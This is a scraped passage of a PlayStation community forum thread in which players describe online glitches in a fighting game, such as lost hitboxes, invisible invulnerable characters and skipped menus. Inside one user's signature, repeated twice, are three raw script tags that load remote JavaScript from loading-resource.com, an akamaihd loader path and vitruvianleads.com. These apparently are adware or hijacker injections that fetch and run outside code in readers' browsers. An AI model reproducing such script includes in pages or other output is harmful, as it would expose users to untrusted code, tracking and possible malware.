Showing results for 
Search instead for 
Do you mean 
Monster Hunter
37 posts

Re: SUCH a great game. SUCH game-breaking glitches.

Nov 22, 2012
online has been generally smooth for me. You are overreacting..Its a new game.
Message 21 of 43 (223 Views)
0 Likes
Splicer
59 posts

Nov 22, 2012
Never have had any of those issues
Message 22 of 43 (218 Views)
0 Likes
First Son
4 posts

Nov 22, 2012

YogurtStorm wrote:

Let's hope they don't pull a Twisted Metal 2012 on us and leave the online broken for 6 months.

They wont., especially when they are throwing money at E-Sport circuits.

Message 23 of 43 (210 Views)
0 Likes
Hekseville Citizen
385 posts

Nov 22, 2012
I encounter a number of glitches online. Being knocked across the map only to be teleported back to where I was, having that happened to someone I just knocked across the map as well. Having it switch my character while its loading. The online's been smooth for me, but the glitches definitely ruin the fun. I have this really frustrating menu glitch, that skips menus. If im selecting characters it will skip at random, so if im next to teh character i want it will select the next one. Does it for backing out and selecting as well, if im choosing my taunt and am done i back out to select an outro for example, and it backs all the way to the menu. Also, sometimes it just skips difficulty selection in single player. Not game breaking but needs to be fixed because it makes menu navigation frustrating as hell.
December 11th 2012: Went 12-0 ranked FFA. (Jak)
December 13th 2012: Went 8-0 Stock Unranked FFA. (Jak)
January 10th 2013: Sniped Asis_aka_talent into Jak's lvl 1. (Uncle Radec)
April 16th 2013: Caught parappa's lvl 2 with Sweet Tooth's lvl 1 and didn't die in the process (Sweet Tooth)
May 5th 2013: Got my Radec eviscerated by whaatxddd's radec in 1v1. Kmart, u better watch out.
Just learnt "Drake" and is now learning "Nariko".
Message 24 of 43 (207 Views)
0 Likes
Gaming Beast
2167 posts

Nov 22, 2012
Good to know I'm not the only one getting this.
Yes, generally it is smooth, but it's best to talk about these glitches and hopefully concentrate them in one thread so Superbot can know what to fix.
A few more things I've noticed:

-I lost hitboxes on my supers halfway through a match. Our game went on for ten minutes because Dante kept missing his supers and mine had no effect (Playing as Drake. Tried comboing into them, tried throwing them out randomly. Hell, in one instance he stood inside the pillars for several seconds!). That being said I have only seen this one time.
-Same match as the above: My throws were not draining enemy AP, which, once the Dante realized both of these were taking place, just waited until level 3.
-Actually... I think this one might have been the same match too...: On the moving stage, I failed to keep up and naturally respawned and lost AP. What wasn't normal is that I respawned off the bottom of the screen, lost AP, immediately got counted as not keeping up again, respawned in the right place this time and lost AP again.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 25 of 43 (200 Views)
0 Likes
Gaming Beast
2167 posts

Nov 23, 2012
Double posting, but I just encountered the weirdest and most complex bug ever.
2v2 unranked stock match with no items on Columbia:

Heihachi/Kratos vs Sly/FP (Me):

As best as I could tell, Sly killed Heihachi with his level 1 as Heihachi used his level 2. As a result Kuma (the bear) just stood there looking dumb and didn't go away. He had no hitbox but did get in the way and could be pushed by characters.
"Okay, that's weird but w/e" I thought. Heihachi uses level 2 again. The bear suddenly starts moving (Did not respawn near Heihachi or anything) but has no hitbox, so he wasted another two bars.
Now we kill the Kratos and end up 2v1 and I notice something else that's strange: Sly and Heihachi can't seem to hurt each other anymore.
Heihachi gets a bar and uses a level 1 super. Now this is possibly the weirdest thing I have ever seen in this game, but instead of doing his karate chop thing, the Pig from Sly's level one dashes forward much like in Sly's level 1, but then jumps back towards Heihachi using what looked like Kuma's jump animation before disappearing. This had a hitbox during both the dash and the jump.
He is able to do this 2 more times and catches me, which leaves just Sly and Heihachi, who try to hit each other in vain before one of them quits.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 26 of 43 (184 Views)
0 Likes
Lombax Warrior
161 posts

Nov 23, 2012

I havn't recieved the game yet, but I was having ALL these problems during the beta and thought they would have been fixed by the time the final game was released.

Message 27 of 43 (180 Views)
Hekseville Citizen
385 posts

Nov 24, 2012
2 more to add.
1. 2v2 enemy parappa and I forget the other. I was jak and friend was sackboy. stock. after the parappas ally was killed (and probably left) everything continued as it normally would. Until I died, and didnt respawn til a minute later, and my ally sackboy turned invisible, and couldnt damage the parappa. half the game was the camera zoomed in on parappa because my ally was invisible, invulnerable and couldnt damage parappa and I couldnt respawn for like 2 minutes after each death. eventually we all just D/Cd.
2. After a game (same ally) we returned to the character select. Only one problem. I couldnt use any buttons, couldnt use the dpad, couldnt select and couldnt back out. Wasnt my controller, as I could stil use the PS button to tell my ally to disband us, thank god he was there, wouldve had to restart the game.
April 16th 2013: Caught parappa's lvl 2 with Sweet Tooth's lvl 1 and didn't die in the process (Sweet Tooth)
May 5th 2013: Got my Radec eviscerated by whaatxddd's radec in 1v1. Kmart, u better watch out.
Message 28 of 43 (162 Views)
0 Likes
Lombax Warrior
123 posts

Nov 24, 2012

Losing_Charlie wrote:

Hugh glitches myself as well.

Patches need to happen. Fast. 

THIS! And nothing else. Fanboys stop blaming our connection. It's fine. We got plenty of other games that work. This one doesn't. Stop it!

Message 29 of 43 (154 Views)
0 Likes
Hekseville Citizen
385 posts

Nov 26, 2012
One more to add.
After an enemy radec died (Ranked FFA) he turned invisible, and he was invulnerable but he could still hit us. When he did his lvl 3 he was just a floating jetpack, but his cursor was also invisible, so we couldnt see where he was aiming.
Message 30 of 43 (144 Views)
0 Likes